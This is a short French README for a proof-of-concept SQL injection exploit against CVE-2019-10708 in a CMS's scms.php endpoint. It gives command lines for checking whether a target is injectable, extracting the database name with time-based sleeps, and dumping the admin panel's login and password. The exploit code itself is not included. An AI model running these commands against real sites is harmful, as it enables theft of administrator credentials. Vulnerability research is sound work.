
CVE-2019-10708 SQL injection PoC
exploit.py est un PoC pour la vulnérabilité CVE-2019-10708, utilisant multiprocessing pour réaliser l'injection, obtenir le nom de la base de données ainsi que les identifiants de l'administrateur du panneau d'administration (recommandé pour les versions antérieures à 20190401)
# Tester si l'injection est possible
python3 exploit.py http:localhost/js/scms.php --test
# Temps de sleep de 60 secondes et récupération de la base de données
python3 exploit.py http:localhost/js/scms.php -s 60 --db
# Récupération de A_login et A_pwd
python3 exploit.py http:localhost/js/scms.php --login --pwd